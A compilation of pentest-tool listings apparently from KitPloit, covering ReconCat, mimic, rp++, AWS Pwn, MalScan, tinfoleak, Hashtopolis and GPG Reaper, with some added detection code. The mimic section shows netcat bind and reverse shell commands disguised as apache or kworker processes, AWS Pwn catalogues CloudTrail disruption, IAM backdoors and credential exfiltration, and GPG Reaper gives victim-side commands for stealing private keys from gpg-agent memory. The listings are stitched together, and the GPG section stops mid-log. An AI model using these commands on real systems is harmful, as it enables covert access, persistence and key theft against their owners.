Channel: KitPloit - PenTest Tools!

ReconCat - Tool To Fetch Archive Url Snapshots From Archive.org


A small PHP application to fetch archive URL snapshots from archive.org.
Using it you can fetch the complete list of snapshot URLs for any single year, or for all available years.
Made specially for penetration-testing purposes.
This application is powered by WMB-Scrapper.

Installation
Clone this repository:
git clone https://github.com/daudmalik06/ReconCat
cd ReconCat
php recon

Requirements
  • This application requires PHP 7+.
  • Multithreading is optional: if you have PHP pthreads installed, you can use it to speed up the process.

Information
  • It saves all snapshots in the Output directory; e.g. for google.com it will create the directory Output/google.com and save all related snapshots there.
  • All snapshots are saved on a per-year basis, i.e. the snapshots of each year are saved in a separate file, e.g. 2009_google.com.
  • Threads are used to fetch several (year-based) snapshot lists concurrently.
  • A single year's snapshots are fetched in a single thread.

Usage
For help
php recon --help


Other commands
php recon --url=https://github.com -t10  (fetch all snapshots of github.com with 10 threads)
php recon -y2012 --url=https://github.com -t10 (fetch the snapshots of github.com for the year 2012 with 10 threads)

Author
Dawood Ikhlaq and Open source community



Mimic - A Tool For Covert Execution In Linux


mimic is a tool for covert execution on Linux x86_64.

What is "covert execution"?
Covert execution is the art of hiding a process. In this case, mimic hides the process in plain sight. mimic can launch any program and make it look like any other program. Any user can use it. It does not require special permissions. It does not require special binaries. It does not require a root kit.

What?! No special privileges??
That is correct. mimic works by rearranging the internal structures of a process in such a way that it confuses the /proc entry for that process. All tools that report the nature of a process do so by examining /proc. If we can bend /proc, then we can hide a process in plain sight. Since we are only altering the state of a process we own, anyone can successfully run mimic.

Can this be detected?!
Of course, but only if you are looking very closely, or running a forensic tool that is looking for this sort of thing. The usefulness behind mimic is that it will prevent someone from becoming suspicious in the first place.

Will this work with scripts?
Yes, but you need to call mimic directly on the interpreter. For example, if the first line of your script is "#!/usr/bin/perl" then you'll want to call mimic like this:
empty@monkey:~$ mimic -e "/usr/bin/perl test.pl" 
By invoking the interpreter directly, mimic can work its magic.

Who is the target audience for mimic?
Anyone who legitimately needs covert execution before they have gotten root. This includes, but is not limited to:
  • Pentesters.
  • Investigators performing covert operations (with the prior approval of their Legal and HR departments, of course.)

Why is it called "mimic"?
Because "Liar, liar, /proc on fire!" was too long.

What is "set_target_pid"?
set_target_pid is a small helper program in the mimic suite that will exhaust pids until the one you want comes back around. This allows you to choose where in the process listing you want your process to sit. Note that the kernel reserves the first 300 pids for kernel threads. If you try to go below that, you'll probably end up running with pid 301.

Installation
git clone https://github.com/emptymonkey/ptrace_do.git
cd ptrace_do
make
cd ..

git clone https://github.com/emptymonkey/mimic.git
cd mimic
make

Usage
usage: mimic -e COMMAND [-m MIMIC] [-b] [-a KEY=VALUE] [-q] [-h]
-e Execute COMMAND.
-m Setup COMMAND to look like MIMIC.
Default for non-root is: "/usr/sbin/apache2 -k start"
Default for root is: "[kworker/0:0]"
-b Launch COMMAND in the background.
-a Add / overwrite KEY to the mimic environment with associated VALUE.
-q Be quiet! Do not print normal output.
-h Print this helpful message.

Notes:
The MIMIC environment will be a copy of the COMMAND environment.
The '_' variable is automatically changed.
The -a flag can be called multiple times to add / overwrite multiple variables.

Examples:
mimic -e /bin/bash
set_target_pid 1 && mimic -e /bin/bash
mimic -b -e "./revsh"
mimic -b -e "nc -l -e /bin/bash"
mimic -b -e "nc -l -e \"mimic -e /bin/bash\""

Examples
First example - Launching a netcat listener as a regular user:
empty@monkey:~$ ./mimic -b -e "/usr/local/bin/ncat -l -e \"./mimic -e /bin/bash\""
Launching child... Success!
Waiting for child to attach... Success!
Initializing ptrace_do... Success!
Determining stack state... Success!
Politely requesting name change... Success!
Searching for main()... Success!
Building execution headers... Success!
Setting up final state... Success!

Good-bye and have a good luck! :)

empty@monkey:~$ ps aux | grep apache
empty 1931 19.5 0.0 16648 1324 pts/1 S 21:41 0:02 /usr/sbin/apache2 -k start
empty 1935 0.0 0.0 7596 836 pts/1 S+ 21:41 0:00 grep apache

empty@monkey:~$ sudo lsof -i -n -P | grep apache
[sudo] password for empty:
apache2 1931 empty 3u IPv6 14462 0t0 TCP *:31337 (LISTEN)
apache2 1931 empty 4u IPv4 14463 0t0 TCP *:31337 (LISTEN)
Second example - Launching a netcat reverse shell as root:
root@monkey:~$ /home/empty/code/mimic/set_target_pid 1 && /home/empty/code/mimic/mimic -b -q -e "/usr/local/bin/ncat -e \"/home/empty/code/mimic/mimic -e \\\"/bin/bash\\\"\" localhost 9999"
Can you spot the fake kworkers? Would you be able to without the help of grep?
root@monkey:~$ ps aux | grep kworker | grep -v grep
root 18 0.0 0.0 0 0 ? S 19:39 0:00 [kworker/3:0]
root 197 0.0 0.0 0 0 ? S 19:39 0:06 [kworker/u:3]
root 198 0.0 0.0 0 0 ? S 19:39 0:06 [kworker/u:4]
root 199 0.0 0.0 0 0 ? S 19:39 0:06 [kworker/u:5]
root 302 23.4 0.0 18748 1912 pts/5 S 22:28 0:02 [kworker/0:0]
root 304 11.4 0.0 3780 296 pts/5 S 22:28 0:00 [kworker/0:0]
root 305 10.8 0.0 10644 1200 pts/5 S 22:28 0:00 [kworker/0:0]
root 426 0.0 0.0 0 0 ? S 20:20 0:00 [kworker/1:0]
root 434 0.0 0.0 0 0 ? S 20:20 0:00 [kworker/3:2]
root 536 0.0 0.0 0 0 ? S 20:12 0:00 [kworker/0:0]
root 879 0.0 0.0 0 0 ? S 20:39 0:00 [kworker/2:0]
root 1463 0.0 0.0 0 0 ? S 19:39 0:00 [kworker/1:2]
root 2132 0.0 0.0 0 0 ? S 19:47 0:00 [kworker/2:2]
root 2607 0.0 0.0 0 0 ? S 20:01 0:01 [kworker/0:1]
Of course, no kworker should have an open socket, but I'm sure you can be more creative with your naming choices than this. :)
root@monkey:~$ lsof -i -n -P | grep kworker
kworker/0 302 root 4u IPv4 20546 0t0 TCP 127.0.0.1:47054->127.0.0.1:9999 (ESTABLISHED)
kworker/0 304 root 4u IPv4 20546 0t0 TCP 127.0.0.1:47054->127.0.0.1:9999 (ESTABLISHED)
kworker/0 305 root 4u IPv4 20546 0t0 TCP 127.0.0.1:47054->127.0.0.1:9999 (ESTABLISHED)
Note that I'm running here as root only because a kworker thread should be very suspicious running as a non-root user. The new mimic name is just a string. It doesn't have to be an existing process. Hell, it doesn't even have to be a real thing!
empty@monkey:~$ code/mimic/mimic -q -e /bin/bash -m "Totally not a rootkit\!"

empty@monkey:~$ ps aux | grep rootkit | grep -v grep
empty 399 2.9 0.0 3780 300 pts/4 S 22:34 0:00 Totally not a rootkit!
empty 400 2.7 0.0 19372 2044 pts/4 S 22:34 0:00 Totally not a rootkit!
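Picking up the "Can this be detected?" question and the kworker/lsof listings above: a real kernel thread has no user-space memory, no controlling terminal, runs as root and never owns a socket, so a process that only looks like one in /proc breaks at least one of those rules. The following is an added example written for this page, not part of mimic; the sample `ps aux` and `lsof -i -n -P` lines are constructed after the listings above, and the daemon-name list and thresholds are assumptions.

```python
"""Heuristics for spotting processes whose /proc-reported name does not fit
the process behind it.  Added example, not part of mimic; the sample
`ps aux` / `lsof -i -n -P` text is constructed, the daemon list is an assumption."""
import re
from dataclasses import dataclass

# Constructed sample in `ps aux` layout:
# USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
SAMPLE_PS = """\
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 18 0.0 0.0 0 0 ? S 19:39 0:00 [kworker/3:0]
root 302 23.4 0.0 18748 1912 pts/5 S 22:28 0:02 [kworker/0:0]
root 536 0.0 0.0 0 0 ? S 20:12 0:00 [kworker/0:0]
empty 1931 19.5 0.0 16648 1324 pts/1 S 21:41 0:02 /usr/sbin/apache2 -k start
empty 399 2.9 0.0 3780 300 pts/4 S 22:34 0:00 Totally not a rootkit!
"""

# Constructed sample in `lsof -i -n -P` layout:
# COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
SAMPLE_LSOF = """\
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
kworker/0 302 root 4u IPv4 20546 0t0 TCP 127.0.0.1:47054->127.0.0.1:9999 (ESTABLISHED)
kworker/0 304 root 4u IPv4 20546 0t0 TCP 127.0.0.1:47054->127.0.0.1:9999 (ESTABLISHED)
apache2 1931 empty 3u IPv6 14462 0t0 TCP *:31337 (LISTEN)
"""

PS_COLUMNS = 10                                   # everything after the 10th field is COMMAND
KERNEL_THREAD = re.compile(r"^\[[^\]]+\]$")       # e.g. [kworker/0:0]
# Daemons that are normally detached from any terminal (assumption; extend per host)
KNOWN_DAEMONS = ("/usr/sbin/apache2", "/usr/sbin/sshd", "/usr/sbin/cron")


@dataclass
class Proc:
    user: str
    pid: int
    vsz: int
    rss: int
    tty: str
    command: str


def parse_ps_aux(text):
    """Parse `ps aux` output; the header line and malformed lines are skipped."""
    procs = []
    for line in text.splitlines():
        parts = line.split(None, PS_COLUMNS)
        if len(parts) <= PS_COLUMNS or not parts[1].isdigit():
            continue
        procs.append(Proc(parts[0], int(parts[1]), int(parts[4]),
                          int(parts[5]), parts[6], parts[10]))
    return procs


def fake_kernel_threads(procs):
    """Bracketed names with user-space memory, a tty or a non-root owner
    cannot be genuine kernel threads.  Returns {pid: [reasons]}."""
    findings = {}
    for p in procs:
        if not KERNEL_THREAD.match(p.command):
            continue
        reasons = []
        if p.vsz or p.rss:
            reasons.append(f"user-space memory VSZ={p.vsz} RSS={p.rss}")
        if p.tty != "?":
            reasons.append(f"controlling tty {p.tty}")
        if p.user != "root":
            reasons.append(f"owned by {p.user}")
        if reasons:
            findings[p.pid] = reasons
    return findings


def daemons_with_tty(procs):
    """Well-known daemons are started detached; one bound to a pts is odd."""
    return {p.pid: p.tty for p in procs
            if p.command.startswith(KNOWN_DAEMONS) and p.tty != "?"}


def kernel_threads_with_sockets(lsof_text):
    """Kernel threads never own TCP/UDP sockets, so any kworker in `lsof -i` is fake."""
    pids = set()
    for line in lsof_text.splitlines():
        parts = line.split()
        if len(parts) >= 8 and parts[0].startswith("kworker") and parts[7] in ("TCP", "UDP"):
            pids.add(int(parts[1]))
    return sorted(pids)


def scan(ps_text, lsof_text):
    procs = parse_ps_aux(ps_text)
    return {"fake_kernel_threads": fake_kernel_threads(procs),
            "daemons_with_tty": daemons_with_tty(procs),
            "kernel_threads_with_sockets": kernel_threads_with_sockets(lsof_text)}


if __name__ == "__main__":
    for check, result in scan(SAMPLE_PS, SAMPLE_LSOF).items():
        print(f"{check}: {result}")
```

The renamed process is still a distinct entry in /proc, so the same checks can be fed the live output of `ps aux` and `lsof -i -n -P` instead of the constructed samples.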


Rp++ - Tool That Aims To Find ROP Sequences In PE/Elf/Mach-O X86/X64 Binaries


rp++ is a tool written entirely in C++ that aims to find ROP sequences in PE/Elf/Mach-O (doesn't support the FAT binaries) x86/x64 binaries. It is open-source, documented with Doxygen (well, I'm trying to..) and has been tested on several OSes: Debian / Windows 7 / FreeBSD / Mac OSX Lion (10.7.3). Moreover, it is x64 compatible. I almost forgot, it handles both Intel and AT&T syntax (beloved BeaEngine). By the way, the tool is a standalone executable.

You can build rp++ very easily with CMake; it will generate a project file for your preferred IDE. There are some other things you will be able to do with rp++, like finding hexadecimal values, or strings, etc.

Benchmark: Is it efficient?
Yeah, here are some benchmarks on Win7 x64, Intel i7 Q720 @ 1.6GHz, 4GB RAM:
- Target: ntoskrnl.exe x64 version 6.1.7601.17790
D:\rp-win-x64.exe --file=ntoskrnl.exe --rop=8 > n
~80s for a total of 267356 gadgets found.

- Target: chrome.exe x86 version 18.0.1025.168
D:\rp-win-x64.exe --file=chrome.exe --rop=8 > n
~13s for a total of 75459 gadgets found.

- Target: cmd.exe x86 version v6.1.7600
D:\rp-win-x64.exe --file=cmd.exe --rop=8 > n
~15s for a total of 18818 gadgets found.

- Target: bash x86 version 4.1.5.1
D:\rp-win-x64.exe --file=bash-x86 --rop=8 > n
~12s for a total of 45385 gadgets found.

Screenshots
rp++ on Win7 x64 / Debian Squeeze x64 / FreeBSD x64 / Mac OSX Lion x64:



How to use it?

USAGE:
./rp++ [-hv] [-f <binary path>] [-i <1,2,3>] [-r <positive int>] [--raw=<archi>]
[--atsyntax] [--unique] [--search-hexa=<\x90A\x90>] [--search-int=<int in hex>]

OPTIONS:
-f, --file=<binary path> give binary path
-i, --info=<1,2,3> display information about the binary header
-r, --rop=<positive int> find useful gadget for your future exploits, arg is the gadget maximum size in instructions
--raw=<archi> find gadgets in a raw file, 'archi' must be in the following list: x86, x64
--atsyntax enable the at&t syntax
--unique display only unique gadget
--search-hexa=<\x90A\x90> try to find hex values
--search-int=<int in hex> try to find a pointer on a specific integer value
-h, --help print this help and exit
-v, --version print version information and exit

Where can I download standalone binaries?
There are x86 and x64 versions for Windows (compiled with VS 2010 on Win7 x64), Linux (compiled with gcc 4.4.5 on Debian x64 6.0.1), FreeBSD (compiled with gcc 4.2.1 on FreeBSD 8.2) and Mac OSX (compiled with gcc 4.2.1 on OSX 10.7.3; not statically linked): https://github.com/0vercl0k/rp/downloads
Here are the sha1sums:


AWS Pwn - A Collection Of AWS Penetration Testing Junk


This is a collection of horribly written scripts for performing various tasks related to penetration testing AWS. Please don't be sad if it doesn't work for you. It might be that AWS has changed since a given tool was written or it might be that the code sux. Either way, please feel free to contribute.
Most of this junk was written by Daniel Grzelak but there's been plenty of contributions, most notably Mike Fuller.

Requirements
pip install -r requirements.txt
Make sure to also set up your aws credentials in ~/.aws/credentials.

Reconnaissance
Things to do with pre-compromise information gathering.
  • validate_iam_access_keys.py - Given a TSV file of access key + secret [+ session] combinations, checks access validity and returns identity information of the principal.
./validate_iam_access_keys.py -i /tmp/keys.txt -o /tmp/out.json
  • validate_s3_buckets.py - Given a text file with one word per line, checks whether the buckets exist and returns basic identifying information.
./validate_s3_buckets.py -i /tmp/words.txt -o /tmp/out.json
  • validate_iam_principals.py - Given a text file of principals (e.g. user/admin, role/deploy), checks whether the principals exist in a given account.
./validate_iam_principals.py -a 123456789012 -i /tmp/words.txt -o /tmp/out.json
  • validate_accounts.py - Given a text file of account ids and account aliases, checks whether the accounts exist.
./validate_accounts.py -i /tmp/accounts.txt -o /tmp/out.json

Exploitation
Things that will help you gain a foothold in an account.

Stealth
Things that might help you stay hidden after compromising an account.
  • disrupt_cloudtrail.py - Attempts to disrupt/cripple cloudtrail logging in the specified way.
./disrupt_cloudtrail.py -s

Exploration
Things to help you understand what you've pwned.
  • dump_account_data.sh - Calls a bunch of generic account-based read/list/get/describe functions and saves the data to a given location. Very noisy but great for a point in time snapshot.
./dump_account_data.sh /tmp/

Elevation
Things to help you move around an account and gather different levels of access.
  • dump_instance_attributes.py - Goes through every EC2 instance in the account and retrieves the specified instance attributes. Most commonly used to retrieve userData, which tends to contain secrets.
./dump_instance_attributes.py -u -o /tmp/
  • dump_cloudformation_stack_descriptions.py - Retrieves the stack descriptions for every existing stack and every stack deleted in the last 90 days. Parameters in stack descriptions often contain passwords and other secrets.
./dump_cloudformation_stack_descriptions.py -o /tmp/data
  • assume_roles.py - Attempts to assume all roles (ARNs) in a file or provided by the list-roles API.
./assume_roles.py -o /tmp/out.json
  • add_iam_policy - Adds the administrator and all action policy to a given user, role, or group. Requires IAM putPolicy or attachPolicy privileges.
./add_iam_policy.py -u myuser -r myrole -g mygroup
  • bouncy_bouncy_cloudy_cloud - Bounces a given ec2 instance and rewrites its userData so that you can run arbitrary code or steal temporary instance profile credentials.
./bouncy_bouncy_cloudy_cloud.py -i instance-id -e exfiltration-endpoint

Persistence
Things to help maintain your access to an account.
  • rabbit_lambda - An example Lambda function that responds to user delete events by creating more copies of the deleted user.
  • cli_lambda - A lambda function that acts as an aws cli proxy and doesn't require credentials.
  • backdoor_created_users_lambda - A lambda function that adds an access key to each newly created user.
  • backdoor_created_roles_lambda - A lambda function that adds a trust relationship to each newly created role.
  • backdoor_created_security_groups_lambda - A lambda function that adds a given inbound access rule to each newly created security group.
  • backdoor_all_users.py - Adds an access key to every user in the account.
  • backdoor_all_roles.py - Adds a trust relationship to each role in the account. Requires editing the file to set the role ARN.
  • backdoor_all_security_groups.py - Adds a given inbound access rule to each security group in the account. Requires editing the file to set the rule.

Exfiltration
Things to help you extract and move data around in AWSy ways.

Miscellanea
Other things that I was either too stupid or too lazy to classify.
  • reserved_words.txt - A list of words/tokens that have some special meaning in AWS or are likely to soon have some special meaning.
  • endpoints.txt - A somewhat up to date list of API endpoints exposed by AWS.
  • integrations.txt - A TSV of services that integrate with AWS via roles or access keys and their account ids, default usernames etc.
  • download_docs.sh - The command line to wget all the AWS docs because I'm stupid and waste time redoing it every time.

To do
  • Add passwords to users for persistence
  • Dump stack resources
  • Validate mfa
  • Add more calls to dump_account_data
  • Add more log disruption methods
  • Create a cloudtrail parsing script for grabbing goodies out of cloudtrail
  • Create an s3 bucket permission enumerator
  • Create tool to grab aws credentials from common places on disk
  • Create cloning tool
  • Create silly privilege escalation tool that uses passrole
  • Validate queues
  • Validate notification topics
  • Fix up persistence scripts to use arguments instead of constants inside the scripts


MalScan - A Simple PE File Heuristics Scanner


MalScan is a simple PE file heuristics scanner written in Python that you can use to quickly analyze a PE file and find out whether anything suspicious exists. It is a simple tool, so it doesn't offer many fancy features. You are free to extend it or do whatever you want with it.

Things Supported
  • Information About file such as MD5, SHA1, Timestamp
  • PEiD Signature Check
  • Custom Yara Rules Integration
  • Section, Imports, Exports, Resources and TLS Callbacks Overview
  • Provides some custom heuristics :-)

Installing
You need to have Python 2.7 installed on your machine. The additional requirement is yara-python.
git clone https://github.com/Ice3man543/MalScan.git
cd MalScan
python malscan.py

Usage
Simply run with the name of file you want to check.

Tinfoleak v2.4 - The Most Complete Open-Source Tool For Twitter Intelligence Analysis


The most complete open-source tool for Twitter intelligence analysis

Introduction
tinfoleak is an open-source tool within the OSINT (Open Source Intelligence) and SOCMINT (Social Media Intelligence) disciplines, that automates the extraction of information on Twitter and facilitates subsequent analysis for the generation of intelligence. Taking a user identifier, geographic coordinates or keywords, tinfoleak analyzes the Twitter timeline to extract great volumes of data and show useful and structured information to the intelligence analyst.
tinfoleak is included in several Linux Distros: Kali, CAINE, BlackArch and Buscador. It is currently the most comprehensive open-source tool for intelligence analysis on Twitter.

tinfoleak can extract the following information:
  • Account info / User Activity / Protected Accounts
  • Source Applications / User Devices / Use Frequency
  • Hashtags / Mentions / Likes
  • Text Analysis / Words Frequency / Media / Metadata
  • User Visited Places / User Routes / User Top Locations
  • Social Networks / Digital Identities
  • Geolocated Users / Tagged Users
  • Followers / Friends
  • Lists / Collections
  • Conversations

Installation
Install Python and dependencies:
sudo apt install python-pip python-dev build-essential python2.7-dev python-pyexiv2 python-openssl
sudo pip install --upgrade pip
sudo pip install --upgrade virtualenv
sudo pip install --upgrade tweepy
sudo pip install --upgrade pillow
sudo pip install --upgrade exifread
sudo pip install --upgrade jinja2
sudo pip install --upgrade oauth2

Getting started
The first time you run tinfoleak, you need to assign the OAuth settings.
  1. Edit "tinfoleak.conf"
    Use your favorite editor ;-)
  2. Give values to these variables:
    CONSUMER_KEY
    CONSUMER_SECRET
    ACCESS_TOKEN
    ACCESS_TOKEN_SECRET
  3. Save "tinfoleak.conf"
  4. Execute "tinfoleak.py"

Hashtopolis - A Hashcat Wrapper For Distributed Hashcracking


Hashtopolis is a multi-platform client-server tool for distributing hashcat tasks to multiple computers. The main goals for Hashtopolis's development are portability, robustness, multi-user support, and multiple groups management. The application has two parts:
  • Agent: multiple clients (C#, Python), easily customizable to suit any need.
  • Server: several PHP/CSS files operating on two endpoints: an Admin GUI and an Agent Connection Point

Aiming for high usability even on restricted networks, Hashtopolis communicates over HTTP(S) using a human-readable, hashing-specific dialect of JSON.
The server part runs on PHP using MySQL as the database back end. It is vital that your MySQL server is configured with performance in mind. Queries can be very expensive and proper configuration makes the difference between a few milliseconds of waiting and disastrous multi-second lags. The database schema heavily profits from indexing. Therefore, if you see a hint about pre-sorting your hashlist, please do so.
The web admin interface is the single point of access for all client agents. New agent deployments require a one-time password generated in the New Agent tab. This reduces the risk of leaking hashes or files to rogue or fake agents.
There are parts of the documentation and wiki which are not up-to-date. If you see anything wrong or have questions on understanding descriptions, feel free to contact us on Twitter (@s3inlc, @winxp5421) or join our Discord server (https://discord.gg/S2NTxbz)
To report a bug, please create an issue and try to describe the problem as accurately as possible. This helps us to identify the bug and see if it is reproducible.
In an effort to make the Hashtopussy project conform to a more politically neutral name it was rebranded to "Hashtopolis" in March 2018.

Features
  • Easy and comfortable to use
  • Accessible from anywhere via web interface
  • Server component highly compatible with common web hosting setups
  • Unattended agents
  • File management for word lists, rules, ...
  • Self-updating of both Hashtopolis and Hashcat
  • Cracking multiple hashlists of the same hash type as though they were a single hashlist
  • Running the same client on Windows, Linux and OS X
  • Files and hashes marked as "secret" are only distributed to agents marked as "trusted"
  • Many data import and export options
  • Rich statistics on hashes and running tasks
  • Visual representation of chunk distribution
  • Multi-user support
  • User permission levels
  • Various notification types
  • Small and/or CPU-only tasks
  • Group assignment for agents and users for fine-grained access-control
  • Compatible with crackers supporting certain flags

Setup and Usage
Please visit the wiki for more information on setup and upgrade.
Some screenshots of Hashtopolis (by winxp5421 and s3in!c) are available on Imgur.


GPG Reaper - Obtain/Steal/Restore GPG Private Keys From Gpg-Agent Cache/Memory


Obtain/Steal/Restore GPG Private Keys from gpg-agent cache/memory

This POC demonstrates a method for obtaining GPG private keys from gpg-agent memory under Windows.
Normally this should be possible only within a 10-minute time frame (the --default-cache-ttl value).
Unfortunately the housekeeping() function (which is responsible for cache cleanup) is executed only while you are using GPG (there is no timer).
This means that in a normal GPG use case, such as signing a file, closing the GUI and doing other tasks, your passphrase is still in gpg-agent memory (even after the TTL has expired).
An attacker who has access to your current session can use this to steal the private key without knowing your passphrase.

Installation
pip install PGPy
If you get the following error when running the Python script:
TypeError: Error when calling the metaclass bases metaclass conflict: the metaclass of a derived class must be a (non-strict) subclass of the metaclasses of all its bases
then:
pip install six==1.10.0

Test
1. Install Gpg4Win 3.0.3
2. Open command line and start agent with 2 seconds cache time:
cd c:\Program Files (x86)\GnuPG\bin
taskkill /im gpg-agent.exe /F
gpg-agent.exe --daemon --default-cache-ttl 2
3. Run Kleopatra and generate new key pair


4. Sign some example test file


5. Pinentry will pop up and ask you for the passphrase


6. Repeat steps 4-5. Each time pinentry shows up, because our 2-second cache has expired
7. Run GPG reaper
powershell -ExecutionPolicy Bypass -File Gpg-Reaper.ps1 -OutputFile testme.txt
You will see something like:
[+] Detect GPG version 3.0.3
[*] Readed jmp bytes: F6-05-E0-F9-45-00-04-0F-85
[*] Readed housekeeping bytes: 55
[+] Find sec key
[+] Check key grip:
[*] uid [ultimate] Adam Nowak <anowak@example.com>
[+] Found public key
[*] Allocate memory at: 2d00000
[+] Read debug log C:\Users\user\AppData\Local\Temp\gpg_D98F5932C4193BF82B9C773F13899DD586A1DE38_KqALSXPH.txt
[+] Key dumped
[*] Kill background Job
[*] Restore bytes
As you can see, the key is dumped. This is possible because we NOPped the housekeeping function.
8. Restore private key:
python gpg_reaper.py .\testme.txt
Private key is dumped to the file:
[+] Dump E057D86EE78A0EED070296C01BC8630ED9C841D0 - Adam Nowak <anowak@example.com>

Introduction
GPG-Agent is a daemon that manages private keys independently from any protocol.
The GUI communicates with the agent using the Assuan protocol.
By default the agent caches your credentials.
The --default-cache-ttl n option sets the time a cache entry is valid to n seconds.
The default is 600 seconds. Each time a cache entry is accessed, its timer is reset.
Under Windows the signing process looks like this:


The crucial part here is the housekeeping() function, which is responsible for removing expired credentials from memory.
But there is one problem: this function is executed in only two places (inside agent_put_cache and agent_get_cache).
This means that cached credentials are NOT removed from memory until some gpg-agent command that uses agent_put_cache, agent_get_cache or agent_flush_cache is executed.
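The cache behaviour just described, modelled in Python as an added illustration (this is not gpg-agent code): housekeeping() runs only from agent_put_cache / agent_get_cache, so an entry whose TTL has passed stays in memory until the agent is used again. The function names follow the text; the cache classes, the fake clock, the placeholder keygrip and the timer-driven variant are assumptions for the demo.

```python
"""Model of the gpg-agent passphrase cache as described in the text above.
Added illustration, not gpg-agent code: housekeeping(), agent_put_cache() and
agent_get_cache() follow the text, everything else is an assumption."""


class FakeClock:
    """Controllable clock so the demo does not need to sleep."""
    def __init__(self):
        self.now = 0.0

    def advance(self, seconds):
        self.now += seconds


class AgentCache:
    def __init__(self, clock, default_cache_ttl=600):   # --default-cache-ttl, 600 s by default
        self.clock = clock
        self.default_cache_ttl = default_cache_ttl
        self._entries = {}   # keygrip -> {"secret": str, "ttl": int, "expires": float}

    def housekeeping(self):
        """Remove expired entries.  Only the two methods below call this;
        there is no timer, exactly as the text describes."""
        now = self.clock.now
        for grip in [g for g, e in self._entries.items() if e["expires"] <= now]:
            del self._entries[grip]

    def agent_put_cache(self, keygrip, secret, ttl=0):
        self.housekeeping()
        ttl = ttl or self.default_cache_ttl   # "requested ttl=0" in the log: use the default
        self._entries[keygrip] = {"secret": secret, "ttl": ttl,
                                  "expires": self.clock.now + ttl}

    def agent_get_cache(self, keygrip):
        self.housekeeping()
        entry = self._entries.get(keygrip)
        if entry is None:
            return None                                     # miss: pinentry would be started
        entry["expires"] = self.clock.now + entry["ttl"]    # a hit resets the timer
        return entry["secret"]

    def secrets_in_memory(self):
        """What a memory dump sees, regardless of whether the TTL has passed."""
        return {g: e["secret"] for g, e in self._entries.items()}


class TimerAgentCache(AgentCache):
    """Hardened variant (assumption, not gpg-agent behaviour): a periodic tick
    runs housekeeping without waiting for the next agent command."""
    def tick(self):
        self.housekeeping()


KEYGRIP = "0000000000000000000000000000000000000000"   # constructed placeholder keygrip


def lingering_secret_demo():
    """Sign once (a put), walk away, and issue no further agent commands."""
    clock = FakeClock()
    cache = AgentCache(clock, default_cache_ttl=2)
    cache.agent_put_cache(KEYGRIP, "passphrase", ttl=0)
    clock.advance(600)                            # far past the 2 s TTL
    still_there = cache.secrets_in_memory()       # expired, but nobody ran housekeeping
    hit = cache.agent_get_cache(KEYGRIP)          # next agent command: miss, and cleanup happens
    return still_there, hit, cache.secrets_in_memory()


def timer_demo():
    clock = FakeClock()
    cache = TimerAgentCache(clock, default_cache_ttl=2)
    cache.agent_put_cache(KEYGRIP, "passphrase")
    clock.advance(3)
    cache.tick()                                  # timer fires independently of agent use
    return cache.secrets_in_memory()


if __name__ == "__main__":
    before, hit, after = lingering_secret_demo()
    print("in memory after TTL expired, no agent calls:", before)
    print("agent_get_cache result:", hit, "-> in memory afterwards:", after)
    print("with timer-driven housekeeping:", timer_demo())
```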

Usage
On victim computer:
powershell -ExecutionPolicy Bypass -File Gpg-Reaper.ps1 -OutputFile out.txt
Transfer out.txt to your machine and restore private keys:
gpg_reaper.py out.txt
Private keys will be dumped into separate files.
If GPG is installed outside default directories:
Gpg-Reaper -GpgConnectAgentPath c:\gpg\gpg-connect-agent.exe -GpgAgentPath c:\gpg\gpg-agent.exe -GpgPath c:\gpg\gpg.exe
If you don't want debug messages:
Gpg-Reaper -Verbose $false

Post exploitation on machine with GPG
Let's assume that you are doing a penetration test and you obtain a shell on a computer with GPG installed.
If you are lucky and the user has used GPG recently and the cache has not expired, you can:
1. Sign some file:
Run c:\Program Files (x86)\GnuPG\bin\gpg-connect-agent.exe
  • Get list of keys available on specific machine
KEYINFO --list
S KEYINFO 38EA3CACAF3A914C5EC2D05F86CDBDCFE83077D2 D - - - P - - -
  • Set keygrip and message hash
SIGKEY 38EA3CACAF3A914C5EC2D05F86CDBDCFE83077D2
# SHA512 of the message
SETHASH 10 7bfa95a688924c47c7d22381f20cc926f524beacb13f84e203d4bd8cb6ba2fce81c57a5f059bf3d509926487bde925b3bcee0635e4f7baeba054e5dba696b2bf
PKSIGN
2. Export private key:
Run c:\Program Files (x86)\GnuPG\bin\gpg-connect-agent.exe
  • Get wrapping key
KEYWRAP_KEY --export
  • Export a secret key from the key store. The key will be encrypted using the current session's key wrapping key using the AESWRAP-128 algorithm
EXPORT_KEY 38EA3CACAF3A914C5EC2D05F86CDBDCFE83077D2
Unfortunately this does not work as expected and asks for the password.
Why? Because the cmd_export_key() function executes agent_key_from_file() with the CACHE_MODE_IGNORE flag, which means the cache won't be used and the user is asked for the passphrase each time.

Bypass private key export restriction
We know that it's not possible to export a GPG key through gpg-agent without knowing the password.
But there is a little quirk here. The agent has a few options available:
1. --debug-level
Select the debug level for investigating problems. level may be a numeric value or a keyword:
guru - All of the debug messages you can get.
2. --log-file file
Append all logging output to file. This is very helpful in seeing what the agent actually does.
Let's run the agent using gpg-agent.exe --daemon --debug-level guru --log-file out.txt and sign some file.
2018-03-04 18:21:15 gpg-agent[7180] DBG: chan_0x0000008c <- SIGKEY 590A068768B6A5CB4DD81CD4828C72AD8427DFE4
2018-03-04 18:21:15 gpg-agent[7180] DBG: chan_0x0000008c -> OK
2018-03-04 18:21:15 gpg-agent[7180] DBG: chan_0x0000008c <- SETKEYDESC Please+enter+the+passphrase+to+unlock+the+OpenPGP+secret+key:%0A%22adam+nowak+<nowak@adam.xxx>%22%0A2048-bit+RSA+key,+ID+1308197BFDF95EAA,%0Acreated+2018-02-28.%0A
2018-03-04 18:21:15 gpg-agent[7180] DBG: chan_0x0000008c -> OK
2018-03-04 18:21:15 gpg-agent[7180] DBG: chan_0x0000008c <- SETHASH 8 B00357D0B85243BB34049E13FD5C328228BC53B317DF970594A1CED6CB89F4EA
2018-03-04 18:21:15 gpg-agent[7180] DBG: chan_0x0000008c -> OK
2018-03-04 18:21:15 gpg-agent[7180] DBG: chan_0x0000008c <- PKSIGN
2018-03-04 18:21:15 gpg-agent[7180] DBG: agent_get_cache '590A068768B6A5CB4DD81CD4828C72AD8427DFE4' (mode 2) ...
2018-03-04 18:21:15 gpg-agent[7180] DBG: ... miss
2018-03-04 18:21:15 gpg-agent[7180] starting a new PIN Entry
2018-03-04 18:21:15 gpg-agent[7180] DBG: connection to PIN entry established
